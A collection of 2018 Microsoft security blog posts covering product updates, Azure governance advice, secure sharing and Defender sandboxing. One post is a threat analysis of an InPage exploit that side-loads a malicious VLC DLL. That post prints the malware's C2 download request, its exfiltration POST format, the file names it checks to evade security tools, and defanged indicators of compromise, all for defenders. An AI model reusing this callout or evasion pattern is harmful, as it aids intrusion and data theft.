The evolution of Microsoft Threat Protection, November update

November 13th, 2018 No comments

At Ignite 2018, we announced Microsoft Threat Protection, a comprehensive, integrated solution securing the modern workplace across identities, endpoints, user data, cloud apps, and, infrastructure (Figure 1).

The foundation of the solution is the Microsoft Intelligent Security Graph, which correlates 6.5 trillion signals daily from email alone and enables:

  • Powerful machine learning developed by Microsofts 3500 in-house security specialists
  • Automation capabilities for enhanced hunting, investigation, and remediationhelping reduce burden on IT teams
  • Seamless integration between disparate services

Figure 1: Microsoft Threat Protection provides an integrated solution securing the modern workplace

Today, we revisit some of the solution capabilities announced at Ignite and provide updates on significant enhancements made since September. Engineers across teams at Microsoft are collaborating to unlock the full, envisioned potential of Microsoft Threat Protection. Throughout this journey, we want to keep you updated on its development.

Services in Microsoft Threat Protection

Microsoft Threat Protection leverages the unique capabilities of different services to secure several attack vectors. Table 1 summarizes the services in the solution. As each individual service is enhanced, so too is the overall solution.

Attack vector Services
Identities

Azure Active Directory Identity Protection

Azure Advanced Threat Protection

Microsoft Cloud App Security

Endpoints

Windows Defender Advanced Threat Protection

Windows 10

Microsoft Intune

User data

Exchange Online Protection

Office 365 Advanced Threat Protection

Office 365 Threat Intelligence

Windows Defender Advanced Threat Protection

Microsoft Cloud App Security

Cloud apps

Exchange Online Protection

Office 365 Advanced Threat Protection

Microsoft Cloud App Security

Infrastructure

Use one solution, Azure Security Center, to protect all your workloads, including SQL, Linux, and Windows, in the cloud and on-premises.

 

Table 1: Services in Microsoft Threat Protection securing the modern workplace attack vectors

Strengthening identity security

By fully integrating Azure Active Directory Identity Protection (Azure AD Identity Protection) with Azure Advanced Threat Protection (Azure ATP) (Figure 2),Microsoft Threat Protection is able to strengthen identity security.Azure AD Identity Protection uses dynamic intelligence and machine learning to automatically protect and detect against identity attacks. Azure ATP is a cloud-powered service leveraging machine learning to help detect suspicious behavior across hybrid environments from various types of advanced external and insider cyberthreats. The integration of the two enables IT teams to manage identities and perform security operations functions through a unified experience that was previously impossible. The integration allows SecOps investigations of risky users between the two products through a single pane of glass. We will start offering customers this integrated experience over the next few weeks.

Figure 2: Integrating Azure ATP with the Azure AD Identity Protection console

Enhanced security for the endpoint

Figure 3 illustrates how Microsoft Threat Protection addresses specific customer challenges.

Figure 3: Microsoft Threat Protection is built to address specific customer challenges

Automation is a powerful capability, promising greater control and shorter threat resolution times even as the digital estate expands. We recently demonstrated our focus on automation by adding automated investigation and remediation capabilities for memory-based/file-less attacks in our industry leading endpoint security service, Windows Defender Advanced Threat Protection (Windows Defender ATP). Now the service can leverage automated memory forensics to incriminate malicious memory regions and perform required in-memory remediation actions. The unique new capability enables fully automated investigations and resolution flow formemory-based attacks, going beyond simply alerting and saving security teams precious time of manual memory forensic effort.

Figure 4 shows the investigation graph of an ongoing investigation in the Windows Defender Security Center. To enable the new feature, run the October 2018 update of Windows 10 and enable the preview features. The capability was released earlier this year and can now mark your alerts as resolved automatically once automation successfully remediates the threat.

Figure 4: Investigation graph of ongoing investigation in Windows Defender Security Center

Elevating user data and cloud app security

Microsoft Threat Protection secures user data by leveraging Office 365 threat protection services, including Office 365 Advanced Threat Protection (Office 365 ATP), which provides best-in-class security in Office 365 against advanced threats to email, collaboration apps, and Office clients. We recently launched Native-Link Rendering, (Figure 5)for both the Outlook Client and the Outlook on the Web applicationenabling users to view the destination URL for links in email. This allows users to make an informed decision before clicking through. This feature was a high demand request from customers who educate users on spotting suspicious links in email and were excited to deliver on it. Office 365 ATP is the only email security service for Office 365 offering this powerful feature.

Figure 5: Native Link Rendering user experience in Office 365 ATP user

Enhancements have also been made in securing cloud apps, beginning with the integration between Microsoft Cloud App Security and Windows Defender ATP. Now, Microsoft Cloud App Security leverages signal from Windows Defender ATP monitored endpoints, enabling discovery and recovery from unsupported cloud service (shadow IT) usage. More recently, Microsoft Cloud App Security further helps reduce impact from shadow IT by providing granular visibility into Open Authentication (OAuth) application permissions that have access to Office 365, G Suite, and Salesforce data. OAuth apps are a newer attack vector often leveraged in phishing attacks, where attackers trick users into granting access to rogue applications. In the managing apps view (Figure 6), admins see a full list of both permissions granted to an OAuth app and the users granting the apps access. The permission level details help admins decide which apps users can continue to have access and which ones will have access revoked.

Figure 6: Microsoft Cloud App Security apps permission management view

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities. Start your trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

 

The post The evolution of Microsoft Threat Protection, November update appeared first on Microsoft Secure.

Categories: Uncategorized Tags:

Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets

November 8th, 2018 No comments

Our analysis of a targeted attack that used a language-specific word processor shows why its important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor software for specific languages like Urdu, Persian, Pashto, and Arabic.

More than 75% of the targets were located in Pakistan; however, the attack also found its way into some countries in Europe and the US. The targets included government institutions.

Figure 1. Geographic distribution of targets

In the past, researchers at Palo Alto and Kaspersky have blogged about attacks that use malicious InPage documents. Beyond that, public research of these types of attacks has been limited.

The Office 365 Research and Response team discovered this type of targeted attack in June. The attack was orchestrated using the following approach:

  • Spear-phishing email with a malicious InPage document with the file name hafeez saeed speech on 22nd April.inp was sent to the intended victims
  • The malicious document, which contained exploit code for CVE-2017-12824, a buffer-overflow vulnerability in InPage reader, dropped a legitimate but outdated version of VLC media player that is vulnerable to DLL hijacking
  • The side-loaded malicious DLL called back to a command-and-control (C&C) site, which triggered the download and execution of the final malware encoded in a JPEG file format
  • The final malware allowed attackers to remotely execute arbitrary command on the compromised machine

Figure 2. Attack infection chain

Office 365 Advanced Threat Protection (ATP) protects customers from this attack by detecting the malicious InPage attachment in spear-phishing emails used in the campaign. Office 365 ATP inspects email attachments and links for malicious content and provides real-time protection against attacks.

Office 365 ATP leverages massive threat intelligence from different data sources and integrates signals from multiple services such as Windows Defender ATP and Azure ATP. For example, Windows Defender Antivirus detects the malicious files and documents used in this attack. Additionally, endpoint detection and response (EDR) capabilities in Windows Defender ATP detects the DLL side-loading and malicious behavior observed in this attack. Through the integration of Office 365 ATP and the rest of Microsoft security technologies in Microsoft Threat Protection, detection and remediation are orchestrated across our solutions.

Entry point: Malicious InPage document

An email with a malicious InPage lure document attached was sent to select targets. The document exploits CVE-2017-12842, a vulnerability in InPage that allows arbitrary code execution. When the malicious InPage document is opened, it executes a shellcode that decrypts and executes an embedded malicious DLL file. The decryption routine is a simple XOR function that uses the decryption key “27729984h”.

Figure 3. First DLL decryption function

Stage 1: DLL side-loading and C&C communication

The decrypted malicious DLL contains two files embedded in the PE resources section. The first resource file is named 200, which is a legitimate version of VLC media player (Product Version: 2.2.1.0, File Version: 2.2.1). The second file in the resources section is named 400, which is a DLL hijacker that impersonates the legitimate file Libvlc.dll.

When run, the stage 1 malware drops both the VLC media player executable and the malicious Libvlc.dll in %TEMP% folder, and then runs the VLC media player process.

The vulnerable VLC media player process searches for the dropped file Libvlc.dll in the directory from which it was loaded. It subsequently picks up and loads the malicious DLL and executes its malicious function.

Figure 4. Functions exported by the malicious Libvlc.dllFigure 5. Functions imported from Libvlc.dll by the VLC media player process

The most interesting malicious code in Libvlc.dll is in the function libvlc_wait(). The malicious code dynamically resolves the API calls to connect to the attacker C&C server and download a JPEG file. If the C&C server is not reachable, the malware calls the API sleep() for five seconds and attempts to call back the attacker domain again.

Figure 6. C&C callback in malicious function libvlc_wait()

If the JPEG file, logo.jpg, is successfully downloaded, the malicious code in libvlc_wait() skips the first 20 bytes of the JPEG file and creates a thread to execute the embedded payload. The code in JPEG file is encoded using Shikata ga nai, a custom polymorphic shellcode encoder/decoder.

Below an example of HTTP request sent to the C&C to download the malicious file logo.jpg.

GET /assets/vnc/logo.jpg HTTP/1.1
Accept: */*
Host: useraccount.co

HTTP/1.1 200 OK
Date: Mon, 09 Jul 2018 13:45:49 GMT
Server: Apache/2.4.33 (cPanel) OpenSSL/1.0.2o mod_bwlimited/1.4 Phusion_Passenger/5.1.12
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Mon, 09 Apr 2018 07:19:20 GMT
ETag: "26e0378-2086b-56965397b5c31"
Accept-Ranges: bytes
Content-Length: 133227
Content-Type: image/jpeg

Figure 7. HTTP GET Request embedded in the JPEG File

The historical Whois record indicated that the C&C server was registered on March 20, 2018.

Domain Name: useraccount.co
Registry Domain ID: D2169366F46A14BCD9EB42AF48BEA813C-NSR
Registrar WHOIS Server:
Registrar URL: whois.publicdomainregistry.com
Updated Date: 2018-03-20T14:04:40Z
Creation Date: 2018-03-20T14:04:40Z
Registry Expiry Date: 2019-03-20T14:04:40Z
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod

Figure 8. Whois record for the attacker C&C server.

The shellcode in the JPEG file uses multiple layers of polymorphic XOR routines to decrypt the final payload. After successfully decrypting the payload, it drops and executes the final DLL malware aflup64.dll in the folder %ProgramData%\Dell64.


Figure 9. The first 29 Bytes of the JPEG file after the header make up the first decryption layer

Figure 10. Valid JPEG file header followed by encrypted malicious code

Stage 2: System reconnaissance and executing attacker commands

The final stage malware maintains persistence using different methods. For example, the malicious function IntRun() can load and execute the malware DLL. It also uses the registry key CurrentVersion\Run to maintain persistence.

The malwares capabilities include:

  • System reconnaissance

    • List computer names, Windows version, Machine ID, running processes, and loaded modules
    • List system files and directories
    • List network configuration

  • Execute attacker commands
  • Evade certain sandboxes or antivirus products

Collected information or responses to commands are sent back to the attacker domain via an HTTP post request. The request has a custom header that always starts with 37 hardcoded alphanumeric characters.

---------------------n9mc4jh3ft7327hfg78kb41b861ft18bhfb91
Content-Disposition: form-data; name="id";
Content-Type: text/plain
<Base64 Data Blob>

Figure 11. Sample of malware POST request

The malware also has a list of hardcoded file names of security products and sandbox solutions. If these files are present in a machine the malware attempts to infect, it exists:

  • avgnt.exe
  • avp.exe
  • egui.exe
  • Sbie.dll
  • VxKernelSvcNT.log

Detecting targeted attacks with Office 365 ATP and Windows Defender ATP

Historically, malware payloads like the stage 2 malware in this attack are used to steal credentials and other sensitive information, install more payloads, or move laterally in the network. However, because the malware opens a backdoor channel for remote attackers to execute arbitrary commands of their choice, theres a wide range of possibilities.

Enterprises can protect themselves from targeted attacks using Office 365 Advanced Threat Protection, which blocks threats based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging sandboxing and time-of-click protection. Recent enhancements in anti-phishing capabilities in Office 365 address impersonation, spoof, phishing content, and internal phishing emails sent from compromised accounts. If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

In addition, enterprises can use Windows Defender Advanced Threat Protection, which provides a unified endpoint security platform for intelligent protection, detection, investigation, and response. Exploit protection, attack surface reduction rules, hardware-based isolation, controlled folder access, and network protection reduce the attack surface. Windows Defender Antivirus detects and blocks the malicious documents and files used in this campaign. Windows Defender ATPs endpoint detection and response, automated investigation and remediation, and advanced hunting capabilities empower security operations personnel to detect and stop attacks in enterprise networks. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

These two services integrate with the rest of Microsofts security technologies as part of the Microsoft Threat Protection, an integrated solution providing security for the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure. Cybersecurity is the central challenge of our digital age, and Microsoft doesnt stop innovating to provide industry-best integrated security. For more information, read the blog post Delivering security innovation that puts Microsofts experience to work for you.

 

 

 

Ahmed Shosha and Abhijeet Hatekar
Microsoft Threat Intelligence Center

 

 

 

Indictors of Compromise (IoCs)

URLs
hxxp://useraccount[.]co/assets/vnc/logo[.]jpg
hxxp://useraccount[.]co/assets/vnc/rest[.]php
hxxp://useraccount[.]co/assets/kvx/success[.]txt
hxxp://useraccount[.]co/assets/pqs/rest[.]php

Files (SHA-256)
013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852 (INP File)
9ffb61f1360595fc707053620f3751cb76c83e67835a915ccd3cbff13cf97bed (EXE)
019b8a0d3f9c9c07103f82599294688b927fbbbdec7f55d853106e52cf492c2b (DLL)

The post Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets appeared first on Microsoft Secure.

CISO series: Build in security from the ground up with Azure enterprise

November 1st, 2018 No comments

As an executive security advisor at Microsoft and a former CISO, I meet with other CISOs every week to discuss cybersecurity, cloud architecture, and sometimes everything under the sun regarding technology. During these discussions with CISOs and other senior security executives of large enterpriseswho are in the beginning stages of a cloud migrationI find theyre excited about the increased flexibility of Microsoft Azure services and the consumption-based model it offers their business units. Regardless of where they are in the journey, they also have some concerns. For example, they need to figure out how to enforce security policies when IT no longer serves as the hub for services and applications.

Specifically, they come to me with the following three questions:

  1. We are interested in Microsoft and already have many of your security solutions. How do these tools translate to a hybrid-cloud solution and where do we start?
  2. Security impacts many parts of the organization outside of the security team. Who do we need to bring to the table across the organization for this to be a successful migration to a secure cloud?
  3. Can we create a roadmap or strategy to guide our journey to the cloud?

It really comes down to balancing agility with governance. Many of my customers have found that the Azure enterprise scaffold and Azure Blueprints (now in preview) can help them balance these two critical priorities. I hope my suggestions and insight help you to understand how to use these tools to smooth your cloud migration.

Establish a flexible hierarchy as the baseline for governance

Scaffolding and blueprints are concepts borrowed from the construction industry. When a construction crew builds a large, complex, and time-consuming project they refer to blueprints and erect scaffolding. Together these tools simplify the process and provide guardrails to guide the builder. You can think of the Azure enterprise scaffold and Azure Blueprints in the same way.

  • Scaffolding is a flexible framework that applies structure and anchors for services and workloads built on Azure. It is a layered process designed to ensure workloads meet the minimum governance requirements of your organization while enabling business groups and developers to quickly meet their own goals.
  • Blueprints are common cloud architecture examples that you can customize for your needs.

Customers find the Azure enterprise scaffold valuable because it can be personalized to the needs of the company for billing, resource management, and resource access. It is grounded in a hierarchy that gives you a structure for subdividing the environment into up to four nested layers to match your organization’s structure:

Enterprise enrollmentThe biggest unit of the hierarchy. Enterprise enrollment defines the specifics of your contracted cloud services.

DepartmentsWithin the enterprise agreement are departments, which can be broken down according to what works best for your organization. Three of the most popular patterns are by function (human resources, information technology, marketing), by business unit (auto, aerospace), and by geography (North America, Europe).

SubscriptionsWithin departments are accounts and then subscriptions. Subscriptions can represent an application, the lifecycle of a service (such as production and non-production), or the departments in your organization.

Resource groupsNested in subscriptions are resource groups, which allow you to put resources into meaningful groups for management, billing, or natural affinity. This hierarchy serves as the foundation for security policies and processes that you will layer on next.

Safeguard your identities and privileged access

When I talk with security executives about implementing security policies, we always start our discussion with identity. You can do the same by identifying who and what systems should have access to what resourcesand how you want to control this access. Once you connect your Azure Active Directory (Azure AD) to your on-premises Active Directory (AD)using the AD Connect toolyou can use role-based access control (RBAC) to assign users to roles, such as owner, contributor, or others that you create. Dont forget to set up Multi-Factor Authentication (MFA) and adhere to the principle of granting the least privilege required to do the work. See Azure identity management best practices for more resources and security tips.

With your hierarchy established and resources assigned, you can use Azure Policy and Initiatives to define policies and apply them to subscriptions.

A couple examples of popular policies include:

  • Restrict specific resources to a geographical region to comply with country or region-specific regulations.
  • Prohibit certain resources, such as servers or data, from being deployed publicly.

Policies are a powerful tool that let you give business units access to the resources they need without exposing the enterprise to additional risk.

You will also need a plan for securing privileged accounts. I recommend creating a privileged access workstation when you start building out your security forest for administrators. Privileged access workstations provide a dedicated operating system for sensitive tasks that separates them from daily workstations and provide additional protection from phishing attacks and other vulnerabilities. With a good identity and access policy in place you have started down the path of trust but verify or building a zero-trust environment.

Gain greater visibility into the security of your entire environment

One big advantage of moving to the cloud is how much more visibility you get into the security of your environment versus on-premises. Azure offers several additional capabilities that allow you to protect your resources and detect threats. TheAzure Security Centerprovides a unified view of the security status of resources across your environment. It includes advanced threat protection that uses artificial intelligence (AI) to detect incoming attacks and sends alerts in a way thats easy to digest. Security DevOps toolkits are a collection of scripts, tools, and automations that allow you to integrate security into native DevOps workflows. Azure update management ensures all your servers are patched with the latest updates.

Get started with Azure Blueprints

Using the scaffolding and blueprints framework can help you establish a secure foundation for your Azure environment by safeguarding identities, resources, networks, and data. Ive touched on a few of the components, and you can dig into the nitty gritty in this article. When youre ready to get started, Azure Blueprintsare available in preview. This capability will allow you to deploy the Azure enterprise scaffold model to your organization. Numerous organizations have used the blueprints and followed the scaffolding approach to successfully roll out their cloud strategy securely and faster than they expected.

As a final note of consideration as you work through your organizations cloud/security strategymake sure you have all the stakeholders in the room. Many times, there are other parts of the organization who own security controls but are outside of the security organization. These might include operations, legal, human resources, information technology, and others. These stakeholders should be brought into the scaffolding and blueprint discussions, so they understand their roles and responsibilities as well as provide input.

If you want to discuss this further or need assistance, please reach out to your Microsoft account team.

The post CISO series: Build in security from the ground up with Azure enterprise appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

How to share content easily and securely

October 31st, 2018 No comments

This is the seventh post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Cumbersome restrictions and limitations on mobile devices, apps, and remote access can be taxing from an IT perspective and frustrating for your employees. Your users need to be able to create, access, and share files from anywhere, and IT needs to ensure that these actions wont compromise your companys security.

Microsoft 365 offers security solutions that help secure your collaboration and productivity apps. That way your employees can connect and communicate wherever they are, using tools they are familiar with, as securely as if they were right at their desks.

How can I securely share documents outside my organization?

Classify documents based on content sensitivity

First, classify documents using Azure Information Protection (AIP). With AIP, you can configure policies to classify, label, and protect data based on its sensitivity. Data can be classified according to standards you define for content, context, and source. These classifications can then be applied automatically or manually, or you can prompt your employees to decide what classification to apply with in-product suggestions.

To classify documents using AIP, you must first configure your companys classification policy. Configure the policy by signing in to the Azure portal as an administrator and then select Azure Information Protection in the apps list. All AIP users start with a default policy that you can configure to suit your needs. Once you have created the policy that works best, publish your changes to deploy the policy to all managed apps and devices.

Use email to share files

Your employees can use email file attachments in Microsoft Outlook to share files. With Outlook, users can take files from their business or personal device, attach files to an email, and access a dedicated library where all group files are stored. If your employees need to send a sensitive message to external users, they can increase security by encrypting the message using Office 365 Message Encryption and the message recipient will decrypt the message using the Office 365 Message Encryption viewer.

Enable users to collaborate

To ensure that shared documents are only viewed by the right person, your users can share files with internal or external partners through OneDrive for Business and apply security features such as password protection and Multi-Factor Authentication.

Microsoft Teamsa chat-based workspaceenables teams to be more productive by giving them a single and secure location that brings together everything a team needs all in one hub, including chats, meetings, calls, files, and tools. Azure Active Directory (Azure AD) conditional access policies can be configured to secure the data in Teams. You can deploy Teams through Microsoft System Center Configuration Manager (ConfigMgr) or Microsoft Intune.

Yammer helps your users improve engagement with everyone in your organization through social networking. Use the security features in Yammer to help protect sensitive organizational data. Yammer supports Azure AD single sign-on authentication, allows admins to set password policies, and provides admins with session management tools that let you see the devices users are signed in to. You can manage access and permissions in Yammer by setting up the Yammer network to comply with your organizations standards.

Identify risky applications and shadow IT

Microsoft Cloud App Security allows you to more securely share documents via third-party applications by identifying the cloud apps on your network. By gaining visibility into shadow IT, you can help protect your information using policies for data sharing and data loss prevention.

How can I work on documents across devices securely?

To work more securely across different devices you will need to manage your mobile devices and set app protection policies. You can use Intune to manage your users mobile devices. To help prevent data loss, you will want to protect company data that is accessed from devices that you dont manage. You can apply Intune app protection policies that restrict access to company resources and avoid company and personal data from getting intermingled. Company data can end up in locations like personal storage or transferred to apps beyond your purview and result in data loss. App protection policies can be used to prevent company data from saving to the local storage of an unmanaged device or moving the data to other apps that aren’t protected by app protection policies.

Deployment tips from our experts

Enable security features in Office 365 appsOffice 365 apps like Outlook, OneDrive, Teams, and Yammer all come with built-in features that enable users to more securely share files and be productive. A few simple things you can do include:

Classify and share documents securelyClassify documents in AIP to track and control how information is used. Then share documents securely via third-party applications using Microsoft Cloud App Security to protect your information.

Prevent data loss on mobile devicesManage mobile devices with Intune and through mobile device management. Then implement app-level controls with Intune app protection policies to help prevent data loss.

Plan for success with Microsoft FastTrackFastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Store and share files inside and outside your organization to work securely across organizational boundaries. You can find additional security resources on Microsoft.com.

Coming Soon! Using controls for security compliance will be the last installment of our Deploying intelligent scenarios series. In November, we will kick off a new series: Top 10 security deployment actions with Microsoft 365 Security.

More blog posts from this series:

The post How to share content easily and securely appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Windows Defender Antivirus can now run in a sandbox

Windows Defender Antivirus has hit a new milestone: the built-in antivirus capabilities on Windows can now run within a sandbox. With this new development, Windows Defender Antivirus becomes the first complete antivirus solution to have this capability and continues to lead the industry in raising the bar for security.

Putting Windows Defender Antivirus in a restrictive process execution environment is a direct result of feedback that we received from the security industry and the research community. It was a complex undertaking: we had to carefully study the implications of such an enhancement on performance and functionality. More importantly, we had to identify high-risk areas and make sure that sandboxing did not adversely affect the level of security we have been providing.

While it was a tall order, we knew it was the right investment and the next step in our innovation journey. It is available to Windows Insiders today. We encourage researchers and partners to try and examine this feature and give us feedback, so we can fine-tune performance, functionality, and security before we make it broadly available.

Why sandbox? Why now?

From the beginning, we designed and built Windows Defender Antivirus to be resistant to attacks. In order to inspect the whole system for malicious content and artifacts, it runs with high privileges. This makes it a candidate for attacks.

Security researchers both inside and outside of Microsofthave previously identified ways that an attacker can take advantage of vulnerabilities in Windows Defender Antiviruss content parsers that could enable arbitrary code execution. While we havent seen attacks in-the-wild actively targeting Windows Defender Antivirus, we take these reports seriously. We immediately fixed potential problems and ramped up our own research and testing to uncover and resolve other possible issues.

At the same time, we continued hardening Windows 10 in general against attacks. Hardware-based isolation, network protection, controlled folder access, exploit protection, and other technologies reduce the attack surface and increase attacker costs. Notably, escalation of privilege from a sandbox is so much more difficult on the latest versions of Windows 10. Furthermore, the integration of Windows Defender Antivirus and other Windows security technologies into Windows Defender ATPs unified endpoint security platform allows signal-sharing and orchestration of threat detection and remediation across components.

Running Windows Defender Antivirus in a sandbox ensures that in the unlikely event of a compromise, malicious actions are limited to the isolated environment, protecting the rest of the system from harm. This is part of Microsofts continued investment to stay ahead of attackers through security innovations. Windows Defender Antivirus and the rest of the Windows Defender ATP stack now integrate with other security components of Microsoft 365 to form Microsoft Threat Protection. Its more important than ever to elevate security across the board, so this new enhancement in Windows Defender Antivirus couldnt come at a better time.

Implementing a sandbox for Windows Defender Antivirus

Modern antimalware products are required to inspect many inputs, for example, files on disk, streams of data in memory, and behavioral events in real time. Many of these capabilities require full access to the resources in question. The first major sandboxing effort was related to layering Windows Defender Antiviruss inspection capabilities into the components that absolutely must run with full privileges and the components that can be sandboxed. The goal for the sandboxed components was to ensure that they encompassed the highest risk functionality like scanning untrusted input, expanding containers, and so on. At the same time, we had to minimize the number of interactions between the two layers in order to avoid a substantial performance cost.

The ability to gradually deploy this feature was another important design goal. Because we would be enabling this on a wide range of hardware and software configurations, we aimed to have the ability at runtime to decide if and when the sandboxing is enabled. This means that the entire content scanning logic can work both in-proc and out-of-proc, and it cant make any assumptions about running with high privileges.

Performance is often the main concern raised around sandboxing, especially given that antimalware products are in many critical paths like synchronously inspecting file operations and processing and aggregating or matching large numbers of runtime events. To ensure that performance doesnt degrade, we had to minimize the number of interactions between the sandbox and the privileged process, and at the same time, only perform these interactions in key moments where their cost would not be significant, for example, when IO is being performed.

Windows Defender Antivirus makes an orchestrated effort to avoid unnecessary IO, for example, minimizing the amount of data read for every inspected file is paramount in maintaining good performance, especially on older hardware (rotational disk, remote resources). Thus, it was crucial to maintain a model where the sandbox can request data for inspection as needed, instead of passing the entire content. An important note: passing handles to the sandbox (to avoid the cost of passing the actual content) isnt an option because there are many scenarios, such as real-time inspection, AMSI, etc., where theres no sharable handle that can be used by the sandbox without granting significant privileges, which decreases the security.

Resource usage is also another problem that required significant investments: both the privileged process and the sandbox process needed to have access to signatures and other detection and remediation metadata. To avoid duplication and preserve strong security guarantees, i.e., avoid unsafe ways to share state or introducing significant runtime cost of passing data/content between the processes, we used a model where most protection data is hosted in memory-mapped files that are read-only at runtime. This means protection data can be hosted into multiple processes without any overhead.

Another significant concern around sandboxing is related to the inter-process communication mechanism to avoid potential problems like deadlocks and priority inversions. The communication should not introduce any potential bottlenecks, either by throttling the caller or by limiting the number of concurrent requests that can be processed. Moreover, the sandbox process shouldn’t trigger inspection operations by itself. All inspections should happen without triggering additional scans. This requires fully controlling the capabilities of the sandbox and ensuring that no unexpected operations can be triggered. Low-privilege AppContainers are the perfect way to implement strong guarantees because the capabilities-based model will allow fine-grained control on specifying what the sandbox process can do.

Lastly, a significant challenge from the security perspective is related to content remediation or disinfection. Given the sensitive nature of the action (it attempts to restore a binary to the original pre-infection content), we needed to ensure this happens with high privileges in order to mitigate cases in which the content process (sandbox) could be compromised and disinfection could be used to modify the detected binary in unexpected ways.

Once the sandboxing is enabled, customers will see a content process MsMpEngCP.exe running alongside with the antimalware service MsMpEng.exe.

The content processes, which run with low privileges, also aggressively leverage all available mitigation policies to reduce the attack surface. They enable and prevent runtime changes for modern exploit mitigation techniques such as Data Execution Prevention (DEP), Address space layout randomization (ASLR), and Control Flow Guard (CFG). They also disable Win32K system calls and all extensibility points, as well as enforce that only signed and trusted code is loaded. More mitigation policies will be introduced in the future, alongside other techniques that aim to reduce even further the risk of compromise, such as multiple sandbox processes with random assignment, more aggressive recycling of sandbox processes without a predictable schedule, runtime analysis of the sandbox behavior, and others.

How to enable sandboxing for Windows Defender Antivirus today

We’re in the process of gradually enabling this capability for Windows insiders and continuously analyzing feedback to refine the implementation.

Users can also force the sandboxing implementation to be enabled by setting a machine-wide environment variable (setx /M MP_FORCE_USE_SANDBOX 1) and restarting the machine. This is currently supported on Windows 10, version 1703 or later.

Looking ahead: Broader availability and continuous innovation

To implement sandboxing for Windows Defender Antivirus, we took a lot of inputs from the feedback, suggestions, and research from our peers in the industry. From the beginning, we saw this undertaking as the security industry and the research community coming together to elevate security. We now call on researchers to follow through, as we did, and give us feedback on the implementation.

Windows Defender Antivirus is on a path of continuous innovation. Our next-gen antivirus solution, which is powered by artificial intelligence and machine learning and delivered in real-time via the cloud, is affirmed by independent testers, adoption in the enterprise, and customers protected every day from malware campaigns big and small. Were excited to roll out this latest enhancement to the rest of our customers.

And we are committed to continue innovating. Were already working on new anti-tampering defenses for Windows Defender Antivirus. This will further harden our antivirus solution against adversaries. Youll hear about these new efforts soon. Windows Defender Antivirus and the rest of the Windows Defender Advanced Threat Protection will continue to advance and keep on leading the industry in raising the bar for security.

 

 

Mady Marinescu
Windows Defender Engineering team
with Eric Avena
Content Experience team

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Windows Defender Antivirus can now run in a sandbox appeared first on Microsoft Secure.

CISO series: Partnering with the C-Suite on cybersecurity

October 24th, 2018 No comments

In my last blog, we looked at five communication techniques that can help engage business managers in the work of cybersecurity. This week, well look at how to use those techniques to bring the C-Suite into the conversation.

Not too long ago, I was speaking with the CIO of a large company (some details have been changed to protect the innocent) about one of my favorite topics: how to define security policies that balance user productivity and business risk. Before long, the CIO said, Trust me, I know all about that. I stopped talking and started listening. He proceeded to tell me about an incident from a previous November. Apparently, during a small window between meetings, he decided to take advantage of the free time to do some online holiday shopping. Were all crushed for time, he knew exactly what he wanted, it took just a few minutes, and then he was off to his meeting. Only he didnt make it very far before the head of security approached to report a security policy violation. Can you believe it? The CIO said. My online shopping was flagged! I had a feeling I knew where this story was going. I got flagged for violating my own policy! he said.

The CIO then explained, It was the middle of summer, and we had just had a small security scare. At the time, the only thing I cared about was doing everything in our power to prevent a bigger incident from happening. By the time the holidays rolled around, Id forgotten all about it. To balance employee productivity, satisfaction, and corporate risk the company decided to allow access to a few selected shopping sites during November and December.

His story got me thinking. Could the company have established a more flexible policy back in the summer if the policy team had properly explained the pros and cons of the restrictive no shopping ever policy? Maybe. There is no way to know definitively. One things for sure: the experience itself clearly made an impression on the CIO. Im a big believer in learning through experience, but since we cant learn every lesson by living through it, there are opportunities to have productive conversations with executives that can increase engagement and mitigate these sorts of issues.

Five communication strategies for engaging executives and the C-Suite with security

Using the same proven communication strategies to frame up security for business managers that we shared in the last blog, Ill show how you can apply those techniques to your conversations with executives and the C-Suite. Heres a hint: it all starts with the same underlying concept. No matter how high up in the organization she or he is, or how many people or responsibilities they have, your CIO is humanand so is your entire executive team. If you apply communication strategies that have been proven to work outside of cybersecurity, you can get your CIO and other executives more involved in security decision-making.

  • FeelOne thing that my conversation with the CIO demonstrates is the role that emotions play. The original policy to lock down all ecommerce on company devices and networks was driven by fear. Emotions are understandable, but they can also drive us to make rash decisions that we regret later. You can diffuse an emotional situation by listening first. Try to understand where the CIO is coming from before you respond to his or her emotions. And above all, resist the temptation to scare an executive into taking security seriously by throwing scary statistics at them. That will only backfire.
  • FocusCIOs and other executives are bombarded with decisions and issues all day long. It can be challenging to get them to focus on your agenda, but its important if you want them to make smart security decisions. Set a meeting for a quiet period in their calendar or have a planning meeting set aside where its agreed cell phones are off and brains are fully engaged. Its amazing what we can accomplish when were not distracted.
  • Slow downThis goes hand in hand with Focus. The timing of and the amount of time for the discussion can also dictate the outcome. Allow space for questions and thoughtfulness. Ive led Executive Introduction to Threat Modeling classes using implantable medical devices (IMDs) and fitness wearables as examples. In the first five minutes most of the class leans toward thinking the IMDs pose all the risk. But once theyve taken the time to threat model both devices for themselves, they realize fitness wearables can be on-trivial threat vectors.
